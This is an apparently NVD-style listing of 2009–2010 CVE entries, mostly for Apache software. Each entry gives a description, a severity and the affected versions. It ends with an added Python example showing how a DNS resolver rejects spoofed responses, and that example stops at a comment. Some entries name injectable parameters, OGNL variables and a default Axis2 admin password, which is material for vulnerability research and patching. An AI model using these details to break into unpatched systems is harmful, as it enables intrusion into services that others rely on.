The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
fedoraproject fedora 12
debian debian_linux 6.0
gnu gnutls *
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
debian debian_linux 7.0
canonical ubuntu_linux 9.04
debian debian_linux 8.0
f5 nginx *
fedoraproject fedora 14
canonical ubuntu_linux 8.04
fedoraproject fedora 13
debian debian_linux 5.0
debian debian_linux 4.0
openssl openssl 1.0
openssl openssl *
fedoraproject fedora 11
mozilla nss *
canonical ubuntu_linux 9.10
CVE-2009-3560 MEDIUM

The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c, a different vulnerability than CVE-2009-2625 and CVE-2009-3720.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
libexpat_project libexpat 2.0.1
apache http_server *
CVE-2009-4269 LOW

The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.

CVSS 2.0

Severity: LOW

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache derby *
CVE-2009-5005 MEDIUM

The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.2
redhat enterprise_mrg 1.1.2
apache qpid *
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2009-5006 MEDIUM

The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.2
redhat enterprise_mrg 1.1.2
apache qpid *
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2010-0009 MEDIUM

Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache couchdb 0.9.0
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.9.2
CVE-2010-0010 MEDIUM

Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server *
apache http_server 1.3.19
apache http_server 1.3.33
apache http_server 1.0.5
apache http_server 1.3.4
apache http_server 1.1
apache http_server 1.3.22
apache http_server 1.3.10
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 1.3.29
apache http_server 1.3.15
apache http_server 1.3.27
apache http_server 1.3.36
apache http_server 1.3.39
apache http_server 0.8.11
apache http_server 1.2.6
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.31
apache http_server 1.3.25
apache http_server 1.3.30
apache http_server 1.3.35
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.0.3
apache http_server 1.3.40
apache http_server 1.3
apache http_server 1.3.32
apache http_server 1.3.37
apache http_server 1.2
apache http_server 1.3.12
apache http_server 1.2.4
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.2
apache http_server 0.8.14
apache http_server 1.3.0
apache http_server 1.2.5
apache http_server 1.3.18
apache http_server 1.3.38
apache http_server 1.3.3
CVE-2010-0136 HIGH

OpenOffice.org (OOo) 2.0.4, 2.4.1, and 3.1.1 does not properly enforce Visual Basic for Applications (VBA) macro security settings, which allows remote attackers to run arbitrary macros via a crafted document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
apache openoffice 3.1.1
debian debian_linux 5.0
apache openoffice 2.4.1
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
apache openoffice 2.0.4
CVE-2010-0219 HIGH

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache axis2 1.5.1
apache axis2 1.4.1
apache axis2 1.6
apache axis2 1.5.2
apache axis2 1.4
sap businessobjects 3.2
apache axis2 1.5
apache axis2 1.3
CVE-2010-0395 HIGH

OpenOffice.org 2.x and 3.0 before 3.2.1 allows user-assisted remote attackers to bypass Python macro security restrictions and execute arbitrary Python code via a crafted OpenDocument Text (ODT) file that triggers code execution when the macro directory structure is previewed.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 12
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 9.04
suse linux_enterprise_desktop 11
opensuse opensuse 11.2
opensuse opensuse 11.1
canonical ubuntu_linux 8.04
fedoraproject fedora 13
debian debian_linux 5.0
suse linux_enterprise_desktop 10
opensuse opensuse 11.0
fedoraproject fedora 11
canonical ubuntu_linux 9.10
CVE-2010-0408 MEDIUM

The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.13
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.12
CVE-2010-0425 HIGH

modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
ibm http_server 6.0.2.19
broadcom vmware_ace_management_server *
apache http_server 2.0.61
apache http_server 2.3.1
ibm http_server 6.0.2.33
ibm http_server 6.1.0.11
apache http_server 2.2.4
apache http_server 2.2.11
ibm http_server 6.0.2
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
ibm http_server 6.0.2.31
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
ibm http_server 6.0.2.3
ibm http_server 6.1.0.5
ibm http_server 6.1.0.13
apache http_server 2.0.32
ibm http_server 6.0.2.35
ibm http_server 6.0.2.21
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
ibm http_server 6.0.2.1
ibm http_server 6.0.2.39
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.3.3
apache http_server 2.0.46
ibm http_server 6.0.2.29
apache http_server 2.3.2
ibm http_server 6.0.2.27
ibm http_server 6.1.0.9
apache http_server 2.0.59
ibm http_server 6.0.2.15
ibm http_server 6.0.2.23
ibm http_server 6.1.0.2
ibm http_server 6.0.2.37
ibm http_server 6.1
apache http_server 2.0.45
apache http_server 2.2.3
ibm http_server 6.1.0.3
apache http_server 2.0.51
apache http_server 2.0.37
ibm http_server 6.1.0.7
ibm websphere_application_server *
apache http_server 2.2.10
apache http_server *
apache http_server 2.3.6
apache http_server 2.3.5
apache http_server -
ibm http_server 6.0.2.11
apache http_server 2.0.52
apache http_server 2.0.39
ibm http_server 6.1.0.15
apache http_server 2.2.7
apache http_server 2.3.0
ibm http_server 6.1.0.19
apache http_server 2.2.2
ibm http_server 6.0.2.25
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.3.4
ibm http_server 6.0.2.7
ibm http_server 6.1.0.29
apache http_server 2.0.58
ibm http_server 6.0.2.9
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
ibm http_server 6.1.0.17
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
ibm http_server 6.1.0.23
apache http_server 2.0.60
ibm http_server 6.0.2.13
ibm http_server 6.1.0.21
apache http_server 2.0.54
ibm http_server 6.1.0.25
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
ibm http_server 6.1.0.27
apache http_server 2.0.28
oracle http_server 10.1.3.5.0
CVE-2010-0432 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2010-0434 MEDIUM

The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 13
debian debian_linux 5.0
debian debian_linux 6.0
fedoraproject fedora 11
CVE-2010-0684 LOW

Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq *
apache activemq 1.1
apache activemq 3.1
apache activemq 1.2
apache activemq 3.2
apache activemq 5.1.0
apache activemq 3.0
apache activemq 4.0
apache activemq 4.0.2
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 1.3
apache activemq 3.2.2
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
apache activemq 2.0
apache activemq 4.1.1
CVE-2010-1151 MEDIUM

Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache apache_http_server *
CVE-2010-1157 LOW

Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-1244 MEDIUM

Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq *
apache activemq 1.1
apache activemq 3.1
apache activemq 1.2
apache activemq 3.2
apache activemq 5.1.0
apache activemq 3.0
apache activemq 4.0
apache activemq 4.0.2
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 1.3
apache activemq 3.2.2
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
apache activemq 2.0
apache activemq 4.1.1
CVE-2010-1452 MEDIUM

The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server 2.2.10
apache http_server *
apache http_server -
apache http_server 2.2.13
apache http_server 2.2.7
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.12
CVE-2010-1587 MEDIUM

The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache activemq 5.3.0
apache activemq 5.3.1
apache activemq 5.0.0
apache activemq 5.2.0
apache activemq 5.4-snapshot
apache activemq 5.1.0
CVE-2010-1623 MEDIUM

Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache apr-util 0.9.9
apache apr-util 1.2.13
apache http_server *
apache apr-util 1.1.0
apache apr-util 0.9.14
apache apr-util 0.9.3
apache apr-util 1.1.1
apache apr-util 1.2.8
apache apr-util 1.3.5
apache apr-util 1.1.2
apache apr-util 1.2.1
apache apr-util 0.9.18
apache apr-util 1.3.4
apache apr-util 1.2.7
apache apr-util 1.3.7
apache apr-util 1.3.2
apache apr-util 0.9.11
apache apr-util 1.2.6
apache apr-util 0.9.16
apache apr-util 0.9.10
apache apr-util 1.3.0
apache apr-util 0.9.8
apache apr-util 1.2.12
apache apr-util 1.3.1
apache apr-util 0.9.6
apache apr-util 1.3.6
apache apr-util *
apache apr-util 0.9.2
apache apr-util 1.2.9
apache apr-util 1.0.1
apache apr-util 0.9.13
apache apr-util 0.9.17
apache apr-util 1.3.8
apache apr-util 1.2.2
apache apr-util 1.3.3
apache apr-util 0.9.1
apache apr-util 0.9.12
apache apr-util 1.0
apache apr-util 0.9.7
apache apr-util 0.9.5
apache apr-util 0.9.15
apache apr-util 1.0.2
apache apr-util 0.9.4
apache apr-util 1.2.10
CVE-2010-1632 HIGH

Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis2 1.4.1
apache axis2 *
apache axis2 1.4
apache axis2 1.5
apache axis2 1.3
CVE-2010-1870 MEDIUM

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "#" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE-2008-6504.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.1.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2010-2057 MEDIUM

shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache myfaces 1.1.6
apache myfaces 1.1.3
apache myfaces 1.2.8
apache myfaces 1.1.1
apache myfaces 1.1.5
apache myfaces 1.2.3
apache myfaces 1.1.2
apache myfaces 1.1.7
apache myfaces 1.1.0
apache myfaces 1.1.4
apache myfaces 1.2.5
apache myfaces 2.0.0
apache myfaces 1.2.2
apache myfaces 1.2.4
apache myfaces 1.2.7
apache myfaces 1.2.6
CVE-2010-2068 MEDIUM

mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.3.5
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.3.4
apache http_server 2.2.13
apache http_server 2.2.11
apache http_server 2.2.12
CVE-2010-2076 HIGH

Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-829,

Products Affected

Vendor Product Version
apache cxf 2.2.5
apache cxf 2.0.4
apache cxf 2.1.5
apache cxf 2.0.5
apache cxf 2.2.2
apache cxf 2.0.2
apache cxf 2.1.3
apache cxf 2.1.2
apache cxf 2.1.6
apache cxf 2.0.12
apache cxf 2.0.6
apache cxf 2.1.7
apache cxf 2.2.6
apache cxf 2.0.8
apache cxf 2.0.10
apache cxf 2.2.7
apache cxf 2.2.1
apache cxf 2.0.9
apache cxf 2.1
apache cxf 2.1.8
apache cxf 2.2.3
apache cxf 2.0.1
apache cxf 2.2.8
apache cxf 2.2
apache cxf 2.1.9
apache cxf 2.0.7
apache cxf 2.0.11
apache cxf 2.2.4
apache cxf 2.0
apache cxf 2.0.3
apache cxf *
apache cxf 2.1.4
apache cxf 2.1.1
CVE-2010-2086 MEDIUM

Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache myfaces 1.2.8
apache myfaces 1.1.7
CVE-2010-2103 MEDIUM

Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache axis2 1.5.1
apache axis2 1.4.1
CVE-2010-2227 MEDIUM

Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-2232 MEDIUM

In Apache Derby 10.1.2.1, 10.2.2.0, 10.3.1.4, and 10.4.1.3, Export processing may allow an attacker to overwrite an existing file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache derby 10.4.1.3
apache derby 10.3.1.4
apache derby 10.1.2.1
apache derby 10.2.2.0
CVE-2010-2234 MEDIUM

Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache couchdb 0.9.0
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.9.2
apache couchdb 0.11.0
CVE-2010-2245 MEDIUM

XML External Entity (XXE) vulnerability in Apache Wink 1.1.1 and earlier allows remote attackers to read arbitrary files or cause a denial of service via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache wink *
CVE-2010-2791 MEDIUM

mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.2.9
CVE-2010-2952 MEDIUM

Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
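
The description names the three things a stub resolver must get right to resist off-path cache poisoning: an unpredictable transaction ID, an unpredictable source port, and a check that the response actually answers the question that was sent. The Python below is an added example, not Traffic Server code: it builds a query with random ID and port, keeps a pending table keyed by that pair, and accepts a datagram only if the ID, the QR bit and the echoed question all line up. The packets in run_constructed_exchange() are constructed for the example; the answer address is from the TEST-NET range.

```python
import secrets
import struct


def encode_qname(name: str) -> bytes:
    """example.com -> b'\\x07example\\x03com\\x00'"""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_qname(msg: bytes, offset: int):
    """Return (name, offset after the name).  Compression pointers are not
    expected in a question section and are treated as malformed."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compressed name in question section")
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


class Resolver:
    """One pending entry per outstanding query, keyed by the unpredictable
    (local source port, transaction id) pair.  An off-path attacker has to
    guess both, roughly 32 bits, instead of a fixed port and a counter."""

    def __init__(self):
        self.pending = {}

    def build_query(self, qname: str, qtype: int = 1, qclass: int = 1):
        txid = secrets.randbits(16)
        sport = secrets.randbelow(65536 - 1024) + 1024   # models a random ephemeral port
        header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, 1 question
        question = encode_qname(qname) + struct.pack("!HH", qtype, qclass)
        self.pending[(sport, txid)] = (qname.lower(), qtype, qclass)
        return sport, header + question

    def accept_response(self, sport: int, msg: bytes) -> bool:
        """sport is the local port the datagram arrived on.  Return True only
        if msg is a plausible answer to a query this resolver sent."""
        if len(msg) < 12:
            return False
        txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", msg[:12])
        key = (sport, txid)
        if key not in self.pending:
            return False                      # unknown id/port: spoofed or stale
        if not flags & 0x8000 or qdcount != 1:
            return False                      # not a response, or odd question count
        try:
            qname, off = decode_qname(msg, 12)
            qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        except (ValueError, IndexError, struct.error):
            return False
        if (qname.lower(), qtype, qclass) != self.pending[key]:
            return False                      # answers a question we never asked
        del self.pending[key]                 # one answer per query: no late duplicates
        return True


# Constructed A record: pointer to the question name, type A, class IN, TTL 300, 192.0.2.1
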